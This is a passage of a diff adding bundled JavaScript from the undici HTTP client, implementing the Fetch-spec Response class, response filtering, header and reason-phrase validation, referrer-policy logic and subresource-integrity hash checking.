{ kEnumerableProperty } = util +const { + isValidReasonPhrase, + isCancelled, + isAborted, + isBlobLike, + 
serializeJavascriptValueToJSONString, + isErrorLike, + isomorphicEncode +} = __nccwpck_require__(2538) +const { + redirectStatusSet, + nullBodyStatus, + DOMException +} = __nccwpck_require__(1037) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { webidl } = __nccwpck_require__(1744) +const { FormData } = __nccwpck_require__(2015) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { URLSerializer } = __nccwpck_require__(685) +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { types } = __nccwpck_require__(3837) + +const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) +const textEncoder = new TextEncoder('utf-8') + +// https://fetch.spec.whatwg.org/#response-class +class Response { + // Creates network error Response. + static error () { + // TODO + const relevantRealm = { settingsObject: {} } + + // The static error() method steps are to return the result of creating a + // Response object, given a new network error, "immutable", and this’s + // relevant Realm. + const responseObject = new Response() + responseObject[kState] = makeNetworkError() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + return responseObject + } + + // https://fetch.spec.whatwg.org/#dom-response-json + static json (data, init = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) + + if (init !== null) { + init = webidl.converters.ResponseInit(init) + } + + // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. + const bytes = textEncoder.encode( + serializeJavascriptValueToJSONString(data) + ) + + // 2. Let body be the result of extracting bytes. + const body = extractBody(bytes) + + // 3. 
Let responseObject be the result of creating a Response object, given a new response, + // "response", and this’s relevant Realm. + const relevantRealm = { settingsObject: {} } + const responseObject = new Response() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kGuard] = 'response' + responseObject[kHeaders][kRealm] = relevantRealm + + // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). + initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) + + // 5. Return responseObject. + return responseObject + } + + // Creates a redirect Response that redirects to url with status status. + static redirect (url, status = 302) { + const relevantRealm = { settingsObject: {} } + + webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) + + url = webidl.converters.USVString(url) + status = webidl.converters['unsigned short'](status) + + // 1. Let parsedURL be the result of parsing url with current settings + // object’s API base URL. + // 2. If parsedURL is failure, then throw a TypeError. + // TODO: base-URL? + let parsedURL + try { + parsedURL = new URL(url, getGlobalOrigin()) + } catch (err) { + throw Object.assign(new TypeError('Failed to parse URL from ' + url), { + cause: err + }) + } + + // 3. If status is not a redirect status, then throw a RangeError. + if (!redirectStatusSet.has(status)) { + throw new RangeError('Invalid status code ' + status) + } + + // 4. Let responseObject be the result of creating a Response object, + // given a new response, "immutable", and this’s relevant Realm. + const responseObject = new Response() + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + + // 5. Set responseObject’s response’s status to status. + responseObject[kState].status = status + + // 6. Let value be parsedURL, serialized and isomorphic encoded. 
+ const value = isomorphicEncode(URLSerializer(parsedURL)) + + // 7. Append `Location`/value to responseObject’s response’s header list. + responseObject[kState].headersList.append('location', value) + + // 8. Return responseObject. + return responseObject + } + + // https://fetch.spec.whatwg.org/#dom-response + constructor (body = null, init = {}) { + if (body !== null) { + body = webidl.converters.BodyInit(body) + } + + init = webidl.converters.ResponseInit(init) + + // TODO + this[kRealm] = { settingsObject: {} } + + // 1. Set this’s response to a new response. + this[kState] = makeResponse({}) + + // 2. Set this’s headers to a new Headers object with this’s relevant + // Realm, whose header list is this’s response’s header list and guard + // is "response". + this[kHeaders] = new Headers(kConstruct) + this[kHeaders][kGuard] = 'response' + this[kHeaders][kHeadersList] = this[kState].headersList + this[kHeaders][kRealm] = this[kRealm] + + // 3. Let bodyWithType be null. + let bodyWithType = null + + // 4. If body is non-null, then set bodyWithType to the result of extracting body. + if (body != null) { + const [extractedBody, type] = extractBody(body) + bodyWithType = { body: extractedBody, type } + } + + // 5. Perform initialize a response given this, init, and bodyWithType. + initializeResponse(this, init, bodyWithType) + } + + // Returns response’s type, e.g., "cors". + get type () { + webidl.brandCheck(this, Response) + + // The type getter steps are to return this’s response’s type. + return this[kState].type + } + + // Returns response’s URL, if it has one; otherwise the empty string. + get url () { + webidl.brandCheck(this, Response) + + const urlList = this[kState].urlList + + // The url getter steps are to return the empty string if this’s + // response’s URL is null; otherwise this’s response’s URL, + // serialized with exclude fragment set to true. + const url = urlList[urlList.length - 1] ?? 
null + + if (url === null) { + return '' + } + + return URLSerializer(url, true) + } + + // Returns whether response was obtained through a redirect. + get redirected () { + webidl.brandCheck(this, Response) + + // The redirected getter steps are to return true if this’s response’s URL + // list has more than one item; otherwise false. + return this[kState].urlList.length > 1 + } + + // Returns response’s status. + get status () { + webidl.brandCheck(this, Response) + + // The status getter steps are to return this’s response’s status. + return this[kState].status + } + + // Returns whether response’s status is an ok status. + get ok () { + webidl.brandCheck(this, Response) + + // The ok getter steps are to return true if this’s response’s status is an + // ok status; otherwise false. + return this[kState].status >= 200 && this[kState].status <= 299 + } + + // Returns response’s status message. + get statusText () { + webidl.brandCheck(this, Response) + + // The statusText getter steps are to return this’s response’s status + // message. + return this[kState].statusText + } + + // Returns response’s headers as Headers. + get headers () { + webidl.brandCheck(this, Response) + + // The headers getter steps are to return this’s headers. + return this[kHeaders] + } + + get body () { + webidl.brandCheck(this, Response) + + return this[kState].body ? this[kState].body.stream : null + } + + get bodyUsed () { + webidl.brandCheck(this, Response) + + return !!this[kState].body && util.isDisturbed(this[kState].body.stream) + } + + // Returns a clone of response. + clone () { + webidl.brandCheck(this, Response) + + // 1. If this is unusable, then throw a TypeError. + if (this.bodyUsed || (this.body && this.body.locked)) { + throw webidl.errors.exception({ + header: 'Response.clone', + message: 'Body has already been consumed.' + }) + } + + // 2. Let clonedResponse be the result of cloning this’s response. + const clonedResponse = cloneResponse(this[kState]) + + // 3. 
Return the result of creating a Response object, given + // clonedResponse, this’s headers’s guard, and this’s relevant Realm. + const clonedResponseObject = new Response() + clonedResponseObject[kState] = clonedResponse + clonedResponseObject[kRealm] = this[kRealm] + clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList + clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] + clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] + + return clonedResponseObject + } +} + +mixinBody(Response) + +Object.defineProperties(Response.prototype, { + type: kEnumerableProperty, + url: kEnumerableProperty, + status: kEnumerableProperty, + ok: kEnumerableProperty, + redirected: kEnumerableProperty, + statusText: kEnumerableProperty, + headers: kEnumerableProperty, + clone: kEnumerableProperty, + body: kEnumerableProperty, + bodyUsed: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'Response', + configurable: true + } +}) + +Object.defineProperties(Response, { + json: kEnumerableProperty, + redirect: kEnumerableProperty, + error: kEnumerableProperty +}) + +// https://fetch.spec.whatwg.org/#concept-response-clone +function cloneResponse (response) { + // To clone a response response, run these steps: + + // 1. If response is a filtered response, then return a new identical + // filtered response whose internal response is a clone of response’s + // internal response. + if (response.internalResponse) { + return filterResponse( + cloneResponse(response.internalResponse), + response.type + ) + } + + // 2. Let newResponse be a copy of response, except for its body. + const newResponse = makeResponse({ ...response, body: null }) + + // 3. If response’s body is non-null, then set newResponse’s body to the + // result of cloning response’s body. + if (response.body != null) { + newResponse.body = cloneBody(response.body) + } + + // 4. Return newResponse. 
+ return newResponse +} + +function makeResponse (init) { + return { + aborted: false, + rangeRequested: false, + timingAllowPassed: false, + requestIncludesCredentials: false, + type: 'default', + status: 200, + timingInfo: null, + cacheState: '', + statusText: '', + ...init, + headersList: init.headersList + ? new HeadersList(init.headersList) + : new HeadersList(), + urlList: init.urlList ? [...init.urlList] : [] + } +} + +function makeNetworkError (reason) { + const isError = isErrorLike(reason) + return makeResponse({ + type: 'error', + status: 0, + error: isError + ? reason + : new Error(reason ? String(reason) : reason), + aborted: reason && reason.name === 'AbortError' + }) +} + +function makeFilteredResponse (response, state) { + state = { + internalResponse: response, + ...state + } + + return new Proxy(response, { + get (target, p) { + return p in state ? state[p] : target[p] + }, + set (target, p, value) { + assert(!(p in state)) + target[p] = value + return true + } + }) +} + +// https://fetch.spec.whatwg.org/#concept-filtered-response +function filterResponse (response, type) { + // Set response to the following filtered response with response as its + // internal response, depending on request’s response tainting: + if (type === 'basic') { + // A basic filtered response is a filtered response whose type is "basic" + // and header list excludes any headers in internal response’s header list + // whose name is a forbidden response-header name. + + // Note: undici does not implement forbidden response-header names + return makeFilteredResponse(response, { + type: 'basic', + headersList: response.headersList + }) + } else if (type === 'cors') { + // A CORS filtered response is a filtered response whose type is "cors" + // and header list excludes any headers in internal response’s header + // list whose name is not a CORS-safelisted response-header name, given + // internal response’s CORS-exposed header-name list. 
+ + // Note: undici does not implement CORS-safelisted response-header names + return makeFilteredResponse(response, { + type: 'cors', + headersList: response.headersList + }) + } else if (type === 'opaque') { + // An opaque filtered response is a filtered response whose type is + // "opaque", URL list is the empty list, status is 0, status message + // is the empty byte sequence, header list is empty, and body is null. + + return makeFilteredResponse(response, { + type: 'opaque', + urlList: Object.freeze([]), + status: 0, + statusText: '', + body: null + }) + } else if (type === 'opaqueredirect') { + // An opaque-redirect filtered response is a filtered response whose type + // is "opaqueredirect", status is 0, status message is the empty byte + // sequence, header list is empty, and body is null. + + return makeFilteredResponse(response, { + type: 'opaqueredirect', + status: 0, + statusText: '', + headersList: [], + body: null + }) + } else { + assert(false) + } +} + +// https://fetch.spec.whatwg.org/#appropriate-network-error +function makeAppropriateNetworkError (fetchParams, err = null) { + // 1. Assert: fetchParams is canceled. + assert(isCancelled(fetchParams)) + + // 2. Return an aborted network error if fetchParams is aborted; + // otherwise return a network error. + return isAborted(fetchParams) + ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) + : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) +} + +// https://whatpr.org/fetch/1392.html#initialize-a-response +function initializeResponse (response, init, body) { + // 1. If init["status"] is not in the range 200 to 599, inclusive, then + // throw a RangeError. + if (init.status !== null && (init.status < 200 || init.status > 599)) { + throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') + } + + // 2. 
If init["statusText"] does not match the reason-phrase token production, + // then throw a TypeError. + if ('statusText' in init && init.statusText != null) { + // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: + // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) + if (!isValidReasonPhrase(String(init.statusText))) { + throw new TypeError('Invalid statusText') + } + } + + // 3. Set response’s response’s status to init["status"]. + if ('status' in init && init.status != null) { + response[kState].status = init.status + } + + // 4. Set response’s response’s status message to init["statusText"]. + if ('statusText' in init && init.statusText != null) { + response[kState].statusText = init.statusText + } + + // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. + if ('headers' in init && init.headers != null) { + fill(response[kHeaders], init.headers) + } + + // 6. If body was given, then: + if (body) { + // 1. If response's status is a null body status, then throw a TypeError. + if (nullBodyStatus.includes(response.status)) { + throw webidl.errors.exception({ + header: 'Response constructor', + message: 'Invalid response status code ' + response.status + }) + } + + // 2. Set response's body to body's body. + response[kState].body = body.body + + // 3. If body's type is non-null and response's header list does not contain + // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. 
+ if (body.type != null && !response[kState].headersList.contains('Content-Type')) { + response[kState].headersList.append('content-type', body.type) + } + } +} + +webidl.converters.ReadableStream = webidl.interfaceConverter( + ReadableStream +) + +webidl.converters.FormData = webidl.interfaceConverter( + FormData +) + +webidl.converters.URLSearchParams = webidl.interfaceConverter( + URLSearchParams +) + +// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit +webidl.converters.XMLHttpRequestBodyInit = function (V) { + if (typeof V === 'string') { + return webidl.converters.USVString(V) + } + + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { + return webidl.converters.BufferSource(V) + } + + if (util.isFormDataLike(V)) { + return webidl.converters.FormData(V, { strict: false }) + } + + if (V instanceof URLSearchParams) { + return webidl.converters.URLSearchParams(V) + } + + return webidl.converters.DOMString(V) +} + +// https://fetch.spec.whatwg.org/#bodyinit +webidl.converters.BodyInit = function (V) { + if (V instanceof ReadableStream) { + return webidl.converters.ReadableStream(V) + } + + // Note: the spec doesn't include async iterables, + // this is an undici extension. 
+ if (V?.[Symbol.asyncIterator]) { + return V + } + + return webidl.converters.XMLHttpRequestBodyInit(V) +} + +webidl.converters.ResponseInit = webidl.dictionaryConverter([ + { + key: 'status', + converter: webidl.converters['unsigned short'], + defaultValue: 200 + }, + { + key: 'statusText', + converter: webidl.converters.ByteString, + defaultValue: '' + }, + { + key: 'headers', + converter: webidl.converters.HeadersInit + } +]) + +module.exports = { + makeNetworkError, + makeResponse, + makeAppropriateNetworkError, + filterResponse, + Response, + cloneResponse +} + + +/***/ }), + +/***/ 5861: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kUrl: Symbol('url'), + kHeaders: Symbol('headers'), + kSignal: Symbol('signal'), + kState: Symbol('state'), + kGuard: Symbol('guard'), + kRealm: Symbol('realm') +} + + +/***/ }), + +/***/ 2538: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { performance } = __nccwpck_require__(4074) +const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) +const assert = __nccwpck_require__(9491) +const { isUint8Array } = __nccwpck_require__(9830) + +// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable +/** @type {import('crypto')|undefined} */ +let crypto + +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +function responseURL (response) { + // https://fetch.spec.whatwg.org/#responses + // A response has an associated URL. It is a pointer to the last URL + // in response’s URL list and null if response’s URL list is empty. + const urlList = response.urlList + const length = urlList.length + return length === 0 ? 
null : urlList[length - 1].toString() +} + +// https://fetch.spec.whatwg.org/#concept-response-location-url +function responseLocationURL (response, requestFragment) { + // 1. If response’s status is not a redirect status, then return null. + if (!redirectStatusSet.has(response.status)) { + return null + } + + // 2. Let location be the result of extracting header list values given + // `Location` and response’s header list. + let location = response.headersList.get('location') + + // 3. If location is a header value, then set location to the result of + // parsing location with response’s URL. + if (location !== null && isValidHeaderValue(location)) { + location = new URL(location, responseURL(response)) + } + + // 4. If location is a URL whose fragment is null, then set location’s + // fragment to requestFragment. + if (location && !location.hash) { + location.hash = requestFragment + } + + // 5. Return location. + return location +} + +/** @returns {URL} */ +function requestCurrentURL (request) { + return request.urlList[request.urlList.length - 1] +} + +function requestBadPort (request) { + // 1. Let url be request’s current URL. + const url = requestCurrentURL(request) + + // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, + // then return blocked. + if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { + return 'blocked' + } + + // 3. Return allowed. + return 'allowed' +} + +function isErrorLike (object) { + return object instanceof Error || ( + object?.constructor?.name === 'Error' || + object?.constructor?.name === 'DOMException' + ) +} + +// Check whether |statusText| is a ByteString and +// matches the Reason-Phrase token production. 
+// RFC 2616: https://tools.ietf.org/html/rfc2616 +// RFC 7230: https://tools.ietf.org/html/rfc7230 +// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" +// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 +function isValidReasonPhrase (statusText) { + for (let i = 0; i < statusText.length; ++i) { + const c = statusText.charCodeAt(i) + if ( + !( + ( + c === 0x09 || // HTAB + (c >= 0x20 && c <= 0x7e) || // SP / VCHAR + (c >= 0x80 && c <= 0xff) + ) // obs-text + ) + ) { + return false + } + } + return true +} + +/** + * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 + * @param {number} c + */ +function isTokenCharCode (c) { + switch (c) { + case 0x22: + case 0x28: + case 0x29: + case 0x2c: + case 0x2f: + case 0x3a: + case 0x3b: + case 0x3c: + case 0x3d: + case 0x3e: + case 0x3f: + case 0x40: + case 0x5b: + case 0x5c: + case 0x5d: + case 0x7b: + case 0x7d: + // DQUOTE and "(),/:;<=>?@[\]{}" + return false + default: + // VCHAR %x21-7E + return c >= 0x21 && c <= 0x7e + } +} + +/** + * @param {string} characters + */ +function isValidHTTPToken (characters) { + if (characters.length === 0) { + return false + } + for (let i = 0; i < characters.length; ++i) { + if (!isTokenCharCode(characters.charCodeAt(i))) { + return false + } + } + return true +} + +/** + * @see https://fetch.spec.whatwg.org/#header-name + * @param {string} potentialValue + */ +function isValidHeaderName (potentialValue) { + return isValidHTTPToken(potentialValue) +} + +/** + * @see https://fetch.spec.whatwg.org/#header-value + * @param {string} potentialValue + */ +function isValidHeaderValue (potentialValue) { + // - Has no leading or trailing HTTP tab or space bytes. + // - Contains no 0x00 (NUL) or HTTP newline bytes. 
+ if ( + potentialValue.startsWith('\t') || + potentialValue.startsWith(' ') || + potentialValue.endsWith('\t') || + potentialValue.endsWith(' ') + ) { + return false + } + + if ( + potentialValue.includes('\0') || + potentialValue.includes('\r') || + potentialValue.includes('\n') + ) { + return false + } + + return true +} + +// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect +function setRequestReferrerPolicyOnRedirect (request, actualResponse) { + // Given a request request and a response actualResponse, this algorithm + // updates request’s referrer policy according to the Referrer-Policy + // header (if any) in actualResponse. + + // 1. Let policy be the result of executing § 8.1 Parse a referrer policy + // from a Referrer-Policy header on actualResponse. + + // 8.1 Parse a referrer policy from a Referrer-Policy header + // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. + const { headersList } = actualResponse + // 2. Let policy be the empty string. + // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. + // 4. Return policy. + const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') + + // Note: As the referrer-policy can contain multiple policies + // separated by comma, we need to loop through all of them + // and pick the first valid one. + // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy + let policy = '' + if (policyHeader.length > 0) { + // The right-most policy takes precedence. + // The left-most policy is the fallback. + for (let i = policyHeader.length; i !== 0; i--) { + const token = policyHeader[i - 1].trim() + if (referrerPolicyTokens.has(token)) { + policy = token + break + } + } + } + + // 2. If policy is not the empty string, then set request’s referrer policy to policy. 
+ if (policy !== '') { + request.referrerPolicy = policy + } +} + +// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check +function crossOriginResourcePolicyCheck () { + // TODO + return 'allowed' +} + +// https://fetch.spec.whatwg.org/#concept-cors-check +function corsCheck () { + // TODO + return 'success' +} + +// https://fetch.spec.whatwg.org/#concept-tao-check +function TAOCheck () { + // TODO + return 'success' +} + +function appendFetchMetadata (httpRequest) { + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header + // TODO + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header + + // 1. Assert: r’s url is a potentially trustworthy URL. + // TODO + + // 2. Let header be a Structured Header whose value is a token. + let header = null + + // 3. Set header’s value to r’s mode. + header = httpRequest.mode + + // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. + httpRequest.headersList.set('sec-fetch-mode', header) + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header + // TODO + + // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header + // TODO +} + +// https://fetch.spec.whatwg.org/#append-a-request-origin-header +function appendRequestOriginHeader (request) { + // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. + let serializedOrigin = request.origin + + // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. + if (request.responseTainting === 'cors' || request.mode === 'websocket') { + if (serializedOrigin) { + request.headersList.append('origin', serializedOrigin) + } + + // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: + } else if (request.method !== 'GET' && request.method !== 'HEAD') { + // 1. 
Switch on request’s referrer policy: + switch (request.referrerPolicy) { + case 'no-referrer': + // Set serializedOrigin to `null`. + serializedOrigin = null + break + case 'no-referrer-when-downgrade': + case 'strict-origin': + case 'strict-origin-when-cross-origin': + // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. + if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { + serializedOrigin = null + } + break + case 'same-origin': + // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. + if (!sameOrigin(request, requestCurrentURL(request))) { + serializedOrigin = null + } + break + default: + // Do nothing. + } + + if (serializedOrigin) { + // 2. Append (`Origin`, serializedOrigin) to request’s header list. + request.headersList.append('origin', serializedOrigin) + } + } +} + +function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { + // TODO + return performance.now() +} + +// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info +function createOpaqueTimingInfo (timingInfo) { + return { + startTime: timingInfo.startTime ?? 0, + redirectStartTime: 0, + redirectEndTime: 0, + postRedirectStartTime: timingInfo.startTime ?? 
0, + finalServiceWorkerStartTime: 0, + finalNetworkResponseStartTime: 0, + finalNetworkRequestStartTime: 0, + endTime: 0, + encodedBodySize: 0, + decodedBodySize: 0, + finalConnectionTimingInfo: null + } +} + +// https://html.spec.whatwg.org/multipage/origin.html#policy-container +function makePolicyContainer () { + // Note: the fetch spec doesn't make use of embedder policy or CSP list + return { + referrerPolicy: 'strict-origin-when-cross-origin' + } +} + +// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container +function clonePolicyContainer (policyContainer) { + return { + referrerPolicy: policyContainer.referrerPolicy + } +} + +// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer +function determineRequestsReferrer (request) { + // 1. Let policy be request's referrer policy. + const policy = request.referrerPolicy + + // Note: policy cannot (shouldn't) be null or an empty string. + assert(policy) + + // 2. Let environment be request’s client. + + let referrerSource = null + + // 3. Switch on request’s referrer: + if (request.referrer === 'client') { + // Note: node isn't a browser and doesn't implement document/iframes, + // so we bypass this step and replace it with our own. + + const globalOrigin = getGlobalOrigin() + + if (!globalOrigin || globalOrigin.origin === 'null') { + return 'no-referrer' + } + + // note: we need to clone it as it's mutated + referrerSource = new URL(globalOrigin) + } else if (request.referrer instanceof URL) { + // Let referrerSource be request’s referrer. + referrerSource = request.referrer + } + + // 4. Let request’s referrerURL be the result of stripping referrerSource for + // use as a referrer. + let referrerURL = stripURLForReferrer(referrerSource) + + // 5. Let referrerOrigin be the result of stripping referrerSource for use as + // a referrer, with the origin-only flag set to true. + const referrerOrigin = stripURLForReferrer(referrerSource, true) + + // 6. 
If the result of serializing referrerURL is a string whose length is + // greater than 4096, set referrerURL to referrerOrigin. + if (referrerURL.toString().length > 4096) { + referrerURL = referrerOrigin + } + + const areSameOrigin = sameOrigin(request, referrerURL) + const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && + !isURLPotentiallyTrustworthy(request.url) + + // 8. Execute the switch statements corresponding to the value of policy: + switch (policy) { + case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) + case 'unsafe-url': return referrerURL + case 'same-origin': + return areSameOrigin ? referrerOrigin : 'no-referrer' + case 'origin-when-cross-origin': + return areSameOrigin ? referrerURL : referrerOrigin + case 'strict-origin-when-cross-origin': { + const currentURL = requestCurrentURL(request) + + // 1. If the origin of referrerURL and the origin of request’s current + // URL are the same, then return referrerURL. + if (sameOrigin(referrerURL, currentURL)) { + return referrerURL + } + + // 2. If referrerURL is a potentially trustworthy URL and request’s + // current URL is not a potentially trustworthy URL, then return no + // referrer. + if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { + return 'no-referrer' + } + + // 3. Return referrerOrigin. + return referrerOrigin + } + case 'strict-origin': // eslint-disable-line + /** + * 1. If referrerURL is a potentially trustworthy URL and + * request’s current URL is not a potentially trustworthy URL, + * then return no referrer. + * 2. Return referrerOrigin + */ + case 'no-referrer-when-downgrade': // eslint-disable-line + /** + * 1. If referrerURL is a potentially trustworthy URL and + * request’s current URL is not a potentially trustworthy URL, + * then return no referrer. + * 2. Return referrerOrigin + */ + + default: // eslint-disable-line + return isNonPotentiallyTrustWorthy ? 
'no-referrer' : referrerOrigin + } +} + +/** + * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url + * @param {URL} url + * @param {boolean|undefined} originOnly + */ +function stripURLForReferrer (url, originOnly) { + // 1. Assert: url is a URL. + assert(url instanceof URL) + + // 2. If url’s scheme is a local scheme, then return no referrer. + if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { + return 'no-referrer' + } + + // 3. Set url’s username to the empty string. + url.username = '' + + // 4. Set url’s password to the empty string. + url.password = '' + + // 5. Set url’s fragment to null. + url.hash = '' + + // 6. If the origin-only flag is true, then: + if (originOnly) { + // 1. Set url’s path to « the empty string ». + url.pathname = '' + + // 2. Set url’s query to null. + url.search = '' + } + + // 7. Return url. + return url +} + +function isURLPotentiallyTrustworthy (url) { + if (!(url instanceof URL)) { + return false + } + + // If child of about, return true + if (url.href === 'about:blank' || url.href === 'about:srcdoc') { + return true + } + + // If scheme is data, return true + if (url.protocol === 'data:') return true + + // If file, return true + if (url.protocol === 'file:') return true + + return isOriginPotentiallyTrustworthy(url.origin) + + function isOriginPotentiallyTrustworthy (origin) { + // If origin is explicitly null, return false + if (origin == null || origin === 'null') return false + + const originAsURL = new URL(origin) + + // If secure, return true + if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { + return true + } + + // If localhost or variants, return true + if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || + (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || + (originAsURL.hostname.endsWith('.localhost'))) { + return true + } + + // If any other, return false + return 
false + } +} + +/** + * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist + * @param {Uint8Array} bytes + * @param {string} metadataList + */ +function bytesMatch (bytes, metadataList) { + // If node is not built with OpenSSL support, we cannot check + // a request's integrity, so allow it by default (the spec will + // allow requests if an invalid hash is given, as precedence). + /* istanbul ignore if: only if node is built with --without-ssl */ + if (crypto === undefined) { + return true + } + + // 1. Let parsedMetadata be the result of parsing metadataList. + const parsedMetadata = parseMetadata(metadataList) + + // 2. If parsedMetadata is no metadata, return true. + if (parsedMetadata === 'no metadata') { + return true + } + + // 3. If parsedMetadata is the empty set, return true. + if (parsedMetadata.length === 0) { + return true + } + + // 4. Let metadata be the result of getting the strongest + // metadata from parsedMetadata. + const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) + // get the strongest algorithm + const strongest = list[0].algo + // get all entries that use the strongest algorithm; ignore weaker + const metadata = list.filter((item) => item.algo === strongest) + + // 5. For each item in metadata: + for (const item of metadata) { + // 1. Let algorithm be the alg component of item. + const algorithm = item.algo + + // 2. Let expectedValue be the val component of item. + let expectedValue = item.hash + + // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e + // "be liberal with padding". This is annoying, and it's not even in the spec. + + if (expectedValue.endsWith('==')) { + expectedValue = expectedValue.slice(0, -2) + } + + // 3. Let actualValue be the result of applying algorithm to bytes. 
+ let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') + + if (actualValue.endsWith('==')) { + actualValue = actualValue.slice(0, -2) + } + + // 4. If actualValue is a case-sensitive match for expectedValue, + // return true. + if (actualValue === expectedValue) { + return true + } + + let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') + + if (actualBase64URL.endsWith('==')) { + actualBase64URL = actualBase64URL.slice(0, -2) + } + + if (actualBase64URL === expectedValue) { + return true + } + } + + // 6. Return false. + return false +} + +// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options +// https://www.w3.org/TR/CSP2/#source-list-syntax +// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 +const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i + +/** + * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata + * @param {string} metadata + */ +function parseMetadata (metadata) { + // 1. Let result be the empty set. + /** @type {{ algo: string, hash: string }[]} */ + const result = [] + + // 2. Let empty be equal to true. + let empty = true + + const supportedHashes = crypto.getHashes() + + // 3. For each token returned by splitting metadata on spaces: + for (const token of metadata.split(' ')) { + // 1. Set empty to false. + empty = false + + // 2. Parse token as a hash-with-options. + const parsedToken = parseHashWithOptions.exec(token) + + // 3. If token does not parse, continue to the next token. + if (parsedToken === null || parsedToken.groups === undefined) { + // Note: Chromium blocks the request at this point, but Firefox + // gives a warning that an invalid integrity was given. The + // correct behavior is to ignore these, and subsequently not + // check the integrity of the resource. + continue + } + + // 4. Let algorithm be the hash-algo component of token. 
